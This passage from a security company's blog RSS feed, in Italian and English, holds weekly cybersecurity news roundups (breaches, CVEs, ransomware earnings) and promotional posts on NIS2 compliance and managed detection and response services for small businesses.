    style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACW0lEQVR42k1SSWtTYRTNr3HpJouCRHFnF0pxoeKwcCGI3RSxkSZibQ1OICLtQnftzoVYWjQopo2ZrM3UtLa+DGZ485T3Eo2RaiDveL+vVPrgvPu94Z5777nHZ1r24ACW3f4Px3EHjtsZtCnabYeD/aMb5kBWNR4P5f41TGtIseujG1RNh6JqECUJLVFEo9HE7jcB2zu7hB1UqzXU601ohgm3bcPQNJ7Dcqk4iMyjwuzc99EDTNNEq9VCt9vFr14Phe2vuBa+i6ln87j9dA53HkdQyGdRKm2hIDuENidiYETUrafpBhWw+j4aBfVmE7F4HIlkEpqmoqkZuP/yORHO4Najacw8mUQ6tQJBqGA5nsHC8nt8SiTxNhpFNp+nqSSPSFnXRGhZ+G66iNd0iET0Z2+PFwhGrmLk1FFcGT+HN68eIv16ljosYWVpCS/m57C4uIBo9B3WP6/jy0aWE0qy8tvHDo7roiFK9ELGcDhELl9AYJTIboxi7HIAs5GLuBc8i9hqDIKoIVuuo1BtoaJaaFku15BLZ9lMQ5Nrp+s6bNsGuwRBQODkcfgDfoyc8MN/7AguXDqNtWQK1zM2znw0cH7NxFiM4gdapKR4BjWmm6ShTmIqqgpZVmjLMidmo03cnMT4RBDh6QeYCoURCk0hl8ujrLVRbKjYJBSbOmpmhybseD9+9phT9rdcJ5sI5QrKlX0wmzBybiPavigyOzFJFDg0hU1TOaS9QhIlN3LIF4pelopRTp/7kG2arf8wuC3oPfvOLHEA5lfWBMuRZBWriRQ2S1teKp1hU/b/Afa+p1S0/JuvAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Scarica il Whitepaper:&quot;
        title=&quot;&quot;
        src=&quot;/website/static/72eb2d1b2764c64d12d3ddf4f0fd81c1/71c1d/cover-NIS2-link.png&quot;
        srcset=&quot;/website/static/72eb2d1b2764c64d12d3ddf4f0fd81c1/804b2/cover-NIS2-link.png 384w,
/website/static/72eb2d1b2764c64d12d3ddf4f0fd81c1/e5715/cover-NIS2-link.png 768w,
/website/static/72eb2d1b2764c64d12d3ddf4f0fd81c1/71c1d/cover-NIS2-link.png 1536w,
/website/static/72eb2d1b2764c64d12d3ddf4f0fd81c1/a878e/cover-NIS2-link.png 2048w&quot;
        sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
    &lt;/span&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Allineamento alla direttiva NIS2]]></title><description><![CDATA[L’importanza dei servizi di Incident Response per prepararsi agli aggiornamenti sulla conformità]]></description><link>https://www.certego.net/blog/whitepaper-nis2/</link><guid isPermaLink="false">whitepaper-nis2</guid><category><![CDATA[Whitepaper]]></category><pubDate>Mon, 11 Dec 2023 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Nel gennaio 2023, gli Stati membri dell&apos;UE hanno formalmente emanato una revisione della Direttiva sulla sicurezza delle reti e dei sistemi informatici (Network and Information Systems - NIS) 2016.&lt;/p&gt;
&lt;p&gt;La direttiva NIS2 aggiornata è stata progettata per ampliare il campo di applicazione dell&apos;originale. Concepita in risposta a diversi cyber attacchi ampiamente pubblicizzati e dannosi, la Direttiva NIS2 rafforza i requisiti di sicurezza, razionalizza gli obblighi di reportistica e introduce misure di supervisione più rigide e requisiti di applicazione più rigorosi.&lt;/p&gt;
&lt;p&gt;In particolare, la direttiva NIS2 impone ad ogni entità critica, &lt;strong&gt;obblighi di notifica per gli incidenti che hanno un &quot;impatto significativo&quot; sulla fornitura dei loro servizi&lt;/strong&gt;. Queste notifiche devono essere effettuate presso l&apos;autorità competente o il CSIRT (Computer Security Incident Response Team) pertinente.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;In questo Whitepaper mostriamo un esempio pratico di come i servizi gestiti di Incident Response di Certego ti permettono di essere conforme agli obblighi di notifica multi-livello richiesti dalla normativa NIS2, in ogni fase di un attacco&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Compila il form per ricevere il Whitepaper e scoprire come prepararsi agli aggiornamenti sulla conformità previsti dal NIS2.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - December 8th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-december-8/</link><guid isPermaLink="false">weekly-highlights-december-8</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 07 Dec 2023 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Okta reveals October security breach was much more damaging&lt;/h2&gt;
&lt;h3&gt;#Breaches and Incidents&lt;/h3&gt;
&lt;p&gt;Initially estimated to affect less than 1% of users, the breach now encompasses all Okta customer support users, compromising their full names and email addresses.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.biometricupdate.com/202312/okta-reveals-october-security-breach-was-much-more-damaging&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;CVE-2023-44302&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;Dell DM5500 5.14.0.0 and prior contain an improper authentication vulnerability.
A remote unauthenticated attacker could potentially exploit this vulnerability to gain access of resources or functionality that could possibly lead to execute arbitrary code.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2023-44302&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;CVE-2023-40056&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;SQL Injection Remote Code Vulnerability was found in the SolarWinds Platform.
This vulnerability can be exploited with a low privileged account.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2023-40056&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Data breach at 23andMe, the genetic testing company, affects 6.9 million profiles&lt;/h2&gt;
&lt;h3&gt;#Breaches and Incidents&lt;/h3&gt;
&lt;p&gt;Reused passwords on 23andMe allowed hackers to access personal data from millions of people, which in some cases included DNA information.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.nytimes.com/2023/12/04/us/23andme-hack-data.html&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Malek Team, the Iran-linked hacker group, claims to have stolen a trove of 500GB of medical data from Ziv Medical Center&lt;/h2&gt;
&lt;h3&gt;#Cyberwar&lt;/h3&gt;
&lt;p&gt;Within various Telegram posts, the group has started to publish documents, including alleged data from the Israeli Defense Forces (IDF).&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.darkreading.com/cyberattacks-data-breaches/israeli-defence-force-medical-data-hacked&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;The European Space Agency explores cybersecurity for space industry&lt;/h2&gt;
&lt;h3&gt;#Space&lt;/h3&gt;
&lt;p&gt;ESA is developing a Space Cybersecurity Operations Centre (C-SOC) to detect and respond to emerging cyberattacks on space system infrastructures.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.darkreading.com/ics-ot-security/european-space-agency-explores-cybersecurity-space-industry?&amp;#x26;web_view=true&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[PMI e cybersecurity, aumentare la protezione e sentirsi al sicuro con i servizi MDR]]></title><description><![CDATA[Perché i servizi di Managed Detection & Response sono fondamentali anche per le PMI]]></description><link>https://www.certego.net/blog/servizi-mdr-per-le-pmi/</link><guid isPermaLink="false">servizi-mdr-per-le-pmi</guid><category><![CDATA[Whitepaper]]></category><pubDate>Sun, 03 Dec 2023 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Il processo di digitalizzazione in atto, ha portato negli ultimi anni ad un significativo aumento dei dispositivi collegati alla rete nelle PMI. Sebbene ciò abbia contribuito al miglioramento dell&apos;efficienza operativa, la crescente interconnessione digitale e l’aumento degli endpoint espongono le PMI a un rischio informatico sempre più elevato.&lt;/p&gt;
&lt;p&gt;I servizi MDR costituiscono un elemento cruciale nell&apos;implementazione di una strategia proattiva in materia di sicurezza informatica, per affrontare le sfide quotidiane a cui anche le PMI sono esposte nel campo della sicurezza informatica, adattandosi con flessibilità alle crescenti e mutevoli esigenze del contesto attuale.&lt;/p&gt;
&lt;p&gt;In questo PDF analizziamo i princiali vantaggi dei servizi di Managed Detection and Response per le Piccole e Medio Imprese.&lt;/p&gt;
&lt;p&gt;Compila il form per ricevere il report e approfondire i risultati della ricerca.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - December 1st]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-december-1/</link><guid isPermaLink="false">weekly-highlights-december-1</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 30 Nov 2023 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Ransomware gang Black Basta has made over $100 million in two years.&lt;/h2&gt;
&lt;h3&gt;#Threat Actors&lt;/h3&gt;
&lt;p&gt;Estimates suggest that the Black Basta ransomware group has earned over $100 million in less than two years.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.infosecurity-magazine.com/news/black-basta-ransomware-group-100/?&amp;#x26;we&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Google has issued a critical security update.&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;Google has issued a critical security update to address various vulnerabilities in the Chrome browser.
Among the addressed issues is a zero-day vulnerability (CVE-2023-6345) actively exploited in the wild.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.helpnetsecurity.com/2023/11/29/cve-2023-6345/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Cloud Security Alliance (CSA) released the Cloud Adversarial Vectors, Exploits, and Threats paper.&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;The paper focuses on recommendations on advancing adversarial analysis and threat mitigation for the cloud security industry.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://cloudsecurityalliance.org/artifacts/cloud-adversarial-vectors-exploits-and-threats/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;ENISA has published &quot;Annual Report Trust Services Security Incidents 2023”.&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;The report gives an aggregate overview of the security incident reports submitted by the supervisory bodies during 2022.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.enisa.europa.eu/publications/trust-services-security-incidents-2022&quot;&gt;go to report&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[PMI: perché la cybersecurity è una priorità]]></title><description><![CDATA[Perché i cyber criminali stanno concentrando i loro sforzi anche sulle piccole e medie imprese]]></description><link>https://www.certego.net/blog/pmi-e-cybersecurity/</link><guid isPermaLink="false">pmi-e-cybersecurity</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Tue, 28 Nov 2023 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Nell&apos;attuale scenario digitale, le aziende di ogni dimensione si trovano ad affrontare una crescente varietà di minacce informatiche.&lt;/p&gt;
&lt;p&gt;Gli attacchi informatici, come ad esempio violazioni dei dati, malware, DDoS, phishing e spyware, rappresentano una seria minaccia per tutte le tipologie di aziende. Se in passato queste minacce erano principalmente associate alle grandi imprese, l&apos;evoluzione della sicurezza informatica rivela un panorama diverso, con &lt;strong&gt;le piccole e medie imprese (PMI) sempre più nel mirino dei criminali informatici&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;In passato, si riteneva che gli attacchi informatici costituissero principalmente una minaccia per le grandi imprese, una prospettiva comprensibile data la considerevole quantità di capitale e proprietà intellettuale coinvolta.&lt;/p&gt;
&lt;p&gt;Oggi sorge spontanea una domanda: &lt;strong&gt;perché i criminali informatici stanno dirigendo la loro attenzione e i loro sforzi sempre più verso le PMI?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;La crescente attenzione dei criminali informatici verso le PMI può essere attribuita, in parte, al fatto che le grandi imprese, rafforzando le proprie difese attraverso l&apos;adozione di strategie e tecnologie di sicurezza avanzate, hanno indotto i malintenzionati a cercare anche obiettivi più accessibili e meno protetti. Le PMI, spesso vincolate da risorse limitate in ambito di sicurezza informatica, diventano così prede allettanti per i criminali informatici.&lt;/p&gt;
&lt;p&gt;Un altro fattore da considerare è il &lt;strong&gt;processo di digitalizzazione&lt;/strong&gt; che sta coinvolgendo le PMI. In risposta a questa trasformazione, le piccole e medie imprese hanno registrato, negli ultimi anni, un significativo aumento dei dispositivi collegati alla rete. Sebbene ciò abbia contribuito al miglioramento dell&apos;efficienza operativa, ha allo stesso tempo creato ulteriori punti di accesso per i criminali informatici. &lt;strong&gt;La crescente interconnessione digitale e l’aumento degli endpoint espongono le PMI a un rischio informatico sempre più elevato&lt;/strong&gt;.
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Consapevolezza dei rischi&lt;/h2&gt;
&lt;p&gt;Un’altra considerazione cruciale riguarda la &lt;strong&gt;percezione delle PMI nei confronti delle minacce informatiche&lt;/strong&gt;. Secondo il report &lt;a href=&quot;https://www.certego.net/blog/cybersecurity-2023/&quot;&gt;&quot;Cybersecurity 2023: qual è la consapevolezza delle aziende italiane&quot;&lt;/a&gt;, commissionato da Certego e condotto da &lt;strong&gt;IPSOS&lt;/strong&gt; a giugno 2023, su un campione di 220 aziende italiane, di cui particolare rilevanza è rivolta alle PMI, &lt;strong&gt;il 52% dei decision maker nell&apos;ambito informatico intervistati, afferma che la propria azienda è &quot;poco&quot; o &quot;per niente&quot; esposta ai rischi informatici&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Il report evidenzia inoltre che, &lt;strong&gt;in risposta alla domanda &quot;con quale probabilità pensa che la sua azienda si troverà a gestire un attacco informatico nei prossimi mesi?&quot;, l&apos;83% degli intervistati dichiara una probabilità &quot;abbastanza bassa&quot;&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Questo divario nella percezione è ancora più rilevante se confrontato con il report di ricerca &lt;a href=&quot;https://www.certego.net/blog/whitepaper-state-of-cybersecurity-h3/&quot;&gt;“State of Cybersecurity 2023”&lt;/a&gt; svolto da Certego, analizzando un campione di 1.200.000 asset monitorati all’interno della piattaforma di cybersecurity Certego PanOptikon®.
L’analisi evidenzia che &lt;strong&gt;nel corso dell&apos;ultimo quadrimestre (luglio-settembre 2023), i tentativi di attacco verso le PMI italiane sono aumentati del 31% rispetto all&apos;anno precedente&lt;/strong&gt;, mentre gli attacchi alle aziende Enterprise sono cresciuti del 13%.
Il report condotto da Certego indica inoltre che, &lt;strong&gt;ad essere aumentati in maniera più esponenziale sono gli attacchi con livelli di severity più elevata (+33%)&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;La discrepanza tra la consapevolezza dichiarata dei rischi e la realtà delle minacce monitorate, rappresenta un rischio non trascurabile; le conseguenze delle interruzioni operative o la perdita dei dati coinvolgono in egual misura tutte le aziende, incluse le PMI. &lt;strong&gt;Questo rende la sicurezza delle PMI ancora più delicata, poiché spesso, queste realtà, devono affrontare sfide crescenti con risorse e competenze limitate nel campo della sicurezza informatica&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Oggi la sicurezza informatica non è più un lusso, ma una necessità per qualsiasi organizzazione che miri a prosperare nell&apos;era digitale. Ma come affrontare questa sfida?
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;h2&gt;Approccio proattivo alla cybersecurity e MDR&lt;/h2&gt;
&lt;p&gt;Le tradizionali tecnologie di difesa preventive, da sole, non sono più sufficienti per contrastare le sofisticate modalità degli attacchi informatici più recenti. Date le tattiche in costante evoluzione adottate dai criminali digitali, &lt;strong&gt;è fondamentale adottare un approccio proattivo&lt;/strong&gt; per garantire la sicurezza dei dati e la continuità operativa aziendale.&lt;/p&gt;
&lt;p&gt;I servizi di &lt;strong&gt;Managed Detection and Response (MDR)&lt;/strong&gt; costituiscono un elemento cruciale nell&apos;implementazione di una strategia proattiva in materia di sicurezza informatica. Rappresentano una soluzione preziosa per affrontare le sfide quotidiane a cui anche le PMI sono esposte nel campo della sicurezza informatica, adattandosi con flessibilità alle crescenti e mutevoli esigenze del contesto attuale.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Combinando tecnologie di rilevamento avanzate a un team di analisti altamente specializzati&lt;/strong&gt;, i più moderni servizi MDR forniscono alle aziende una soluzione di sicurezza pronta all&apos;uso che consente di individuare, analizzare, investigare e rispondere alle minacce in modo efficiente, semplificando le attività di Incident Response e riducendo i tempi di risposta, limitando così l&apos;impatto degli attacchi.&lt;/p&gt;
&lt;h2&gt;Vantaggi di un moderno servizio di MDR&lt;/h2&gt;
&lt;br&gt;
&lt;h3&gt;Monitoraggio continuo 24/7&lt;/h3&gt;
&lt;p&gt;Gli attacchi informatici possono avvenire in qualsiasi momento, soprattutto quando il team IT è meno disponibile, come di notte, weekend e festività. &lt;strong&gt;I servizi MDR offrono copertura 24/7, garantendo tranquillità e sicurezza&lt;/strong&gt;. Per i team IT aziendali, ciò significa potersi concentrare sulle attività più strettamente correlate al business e… dormire meglio. Per i dirigenti, il monitoraggio 24/7 ad opera di un team esterno esperto e la prontezza in ogni momento in caso di attività rappresenta un’importante rassicurazione di continuità operativa aziendale.
&lt;br&gt;&lt;/p&gt;
&lt;h3&gt;Riduzione dell&apos;impatto sulle operazioni aziendali&lt;/h3&gt;
&lt;p&gt;Le attività di Monitoring, Detection e Incident Response richiedono tempo e sono imprevedibili. &lt;strong&gt;I servizi MDR liberano capacità IT, consentendo ai team aziendali di concentrarsi su sfide strategiche per il business&lt;/strong&gt;, delegando le attività di cybersecurity al fornitore di servizi MDR.
&lt;br&gt;&lt;/p&gt;
&lt;h3&gt;Colmare le lacune di competenza&lt;/h3&gt;
&lt;p&gt;La gestione delle minacce richiede competenze specializzate, spesso difficili da trovare in-house. &lt;strong&gt;I servizi MDR forniscono l&apos;esperienza necessaria&lt;/strong&gt;, consentendo alle organizzazioni di ampliare le capacità di sicurezza senza l&apos;onere di aumentare il personale.
&lt;br&gt;&lt;/p&gt;
&lt;h3&gt;Massimizzare gli investimenti in cybersecurity&lt;/h3&gt;
&lt;p&gt;Costituire e mantenere un team interno per il monitoraggio delle minacce 24/7 è costoso e richiede numerosi membri del personale. &lt;strong&gt;I servizi MDR offrono una soluzione efficiente in termini di costi&lt;/strong&gt; per proteggere l&apos;organizzazione e massimizzare il budget in sicurezza informatica.
&lt;br&gt;&lt;/p&gt;
&lt;p&gt;La sicurezza informatica è cruciale per ogni organizzazione, con le statistiche che indicano una continua crescita delle minacce informatiche. &lt;strong&gt;Le PMI devono adottare un approccio proattivo e rivisitare le loro strategie di difesa&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;I servizi di Managed Detection &amp;#x26; Response non sono un’opportunità solo alle grandi imprese, ma &lt;strong&gt;rappresentano un mezzo fondamentale per le PMI&lt;/strong&gt;: sfruttando tecnologie, competenze e risorse fornite dal provider MDR, le PMI possono migliorare le attività di monitoraggio, semplificare la gestione delle minacce e adattare i sistemi di difesi alla continua evoluzione delle minacce emergenti.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[State of cybersecurity - H3 2023]]></title><description><![CDATA[Il report realizzato da Certego per AUSED che racconto la stato della sicurezza delle aziende italiane]]></description><link>https://www.certego.net/blog/whitepaper-state-of-cybersecurity-h3/</link><guid isPermaLink="false">whitepaper-state-of-cybersecurity-h3</guid><category><![CDATA[Whitepaper]]></category><pubDate>Tue, 28 Nov 2023 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;State of Cybersecurity è la ricerca realizzata da Certego per &lt;strong&gt;AUSED&lt;/strong&gt;, l’Associazione tra Utenti di Sistemi e Tecnologie dell’informazione che raccoglie oltre duecento aziende.&lt;/p&gt;
&lt;p&gt;L’obiettivo della ricerca, basata su un campione di 1.200.000 asset monitorati all’interno della piattaforma PanOptikon, è confrontare i volumi di attacco del 2023, con quelli del 2022.
Il seguente report confronta il periodo Luglio-Settembre 2023 con lo stesso periodo dell&apos;anno precedente.&lt;/p&gt;
&lt;p&gt;Gli incidenti sono diventati più pericolosi? Quali sono le superfici di attacco più a rischio? Quali sono i settori maggiormente esposti? Qual è il rapporto tra falsi positivi e incidenti reali?&lt;/p&gt;
&lt;p&gt;Sono alcune delle domande a cui rispondiamo all’interno del report.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Compila il form e ricevi il PDF&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - November 24th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-november-24/</link><guid isPermaLink="false">weekly-highlights-november-24</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 23 Nov 2023 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Citrix provides additional measures to address Citrix Bleed.&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;Citrix warns admins to kill &lt;strong&gt;NetScaler&lt;/strong&gt; user sessions to block hackers.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://cybersecuritynews.com/citrix-warns-kill-active/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Intel has notified its users of the existence of a high-criticality vulnerability in some of its processors.&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;The new vulnerability, tracked as &lt;strong&gt;Reptar&lt;/strong&gt;, can be exploited for &lt;strong&gt;DoS&lt;/strong&gt; attacks and &lt;strong&gt;privilege escalation&lt;/strong&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.securityweek.com/new-intel-cpu-vulnerability-reptar-can-allow-dos-attacks-privilege-escalation/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;According to European Central Bank, banks need to improve their controls on IT and cybersecurity risk.&lt;/h2&gt;
&lt;h3&gt;#Finance and Cybersecurity&lt;/h3&gt;
&lt;p&gt;Board members will have to focus more on cyber resilience in order to quickly get their institutions fit for &lt;strong&gt;DORA regulation&lt;/strong&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bankingsupervision.europa.eu/press/publications/newsletter/2023/html/ssm.nl231115.en.html&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;br&gt;
&lt;br&gt;
&lt;/blockquote&gt;
&lt;h2&gt;EU institutions conducted cybersecurity exercise&lt;/h2&gt;
&lt;h3&gt;#European Union&lt;/h3&gt;
&lt;p&gt;EU institutions conducted cybersecurity exercise to test their &lt;strong&gt;crisis plans and possible responses&lt;/strong&gt; to potential cybersecurity incidents affecting the European &lt;strong&gt;elections&lt;/strong&gt; in 2024&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: [read more](&lt;a href=&quot;https://www.enisa.europa.eu/news/eu-cybersecurity-exercise-foster-cooperation-secure-free-and-fair-eu-elections&quot;&gt;https://www.enisa.europa.eu/news/eu-cybersecurity-exercise-foster-cooperation-secure-free-and-fair-eu-elections&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;)&lt;/p&gt;
&lt;blockquote&gt;
&lt;br&gt;
&lt;br&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - November 17th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-november-17/</link><guid isPermaLink="false">weekly-highlights-november-17</guid><category><![CDATA[Blog]]></category><pubDate>Thu, 16 Nov 2023 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;ENISA published its 4th NIS Investments report&lt;/h2&gt;
&lt;h3&gt;#Research&lt;/h3&gt;
&lt;p&gt;With major cyber incident costs up 25% in 2022, the report shows only a 0.4% rise in cybersecurity budget by
EU operators in scope of the &lt;strong&gt;NIS Directive&lt;/strong&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.enisa.europa.eu/news/cybersecurity-investment-spotlight-on-vulnerability-management&quot;&gt;check the report&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Australian ports reopen after a serious cyber attack&lt;/h2&gt;
&lt;h3&gt;#Breaches &amp;#x26; Incidents&lt;/h3&gt;
&lt;p&gt;Last week, the &lt;strong&gt;largest Australian port operator&lt;/strong&gt;, DPWorld, &lt;strong&gt;suspended operations&lt;/strong&gt; at several ports in the country following a cyber attack.
&lt;strong&gt;Almost 30,000 containers have been stuck in Australian ports&lt;/strong&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/dp-world-cyberattack-blocks-thousands-of-containers-in-ports/&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Last May, Denmark was hit by the largest cyberattack ever recorded in the Scandinavian country&lt;/h2&gt;
&lt;h3&gt;#Breaches &amp;#x26; Incidents&lt;/h3&gt;
&lt;p&gt;SektorCERT, the non-profit cybersecurity center for critical sectors in Denmark, has announced that last May, 22 energy firms were hacked in the largest coordinated attack on Denmark’s critical infrastructure.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://thehackernews.com/2023/11/russian-hackers-launch-largest-ever.html&quot;&gt;read more&lt;/a&gt;
&lt;br&gt;
&lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;</content:encoded></item><item><title><![CDATA[Weekly Highlights - November 10th]]></title><description><![CDATA[News and cybercrime updates selected by Certego]]></description><link>https://www.certego.net/blog/weekly-highlights-november-10/</link><guid isPermaLink="false">weekly-highlights-november-10</guid><category><![CDATA[Blog]]></category><pubDate>Wed, 08 Nov 2023 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;MITRE Corporation released ATT&amp;#x26;CK v14&lt;/h2&gt;
&lt;h3&gt;#Threat Detection&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;MITRE&lt;/strong&gt; released &lt;strong&gt;ATT&amp;#x26;CK v14&lt;/strong&gt;, the latest version of its widely used &lt;strong&gt;knowledge base&lt;/strong&gt; of adversary tactics and techniques.
This new version includes significant improvements to &lt;strong&gt;detections&lt;/strong&gt;, &lt;strong&gt;ICS&lt;/strong&gt;, &lt;strong&gt;mobile&lt;/strong&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://attack.mitre.org/resources/versions/&quot;&gt;link to the latest version&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Google warns how hackers could abuse Calendar service&lt;/h2&gt;
&lt;h3&gt;#Vulnerabilities&lt;/h3&gt;
&lt;p&gt;Google is warning of multiple threat actors sharing a public proof-of-concept (&lt;strong&gt;PoC&lt;/strong&gt;) exploit that leverages its &lt;strong&gt;Calendar&lt;/strong&gt; service to host command-and-control (&lt;strong&gt;C2&lt;/strong&gt;) infrastructure.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Explore details: &lt;a href=&quot;https://securityaffairs.com/153700/hacking/google-calendar-rat-attacks.html&quot;&gt;read more&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;br&gt;
&lt;br&gt;
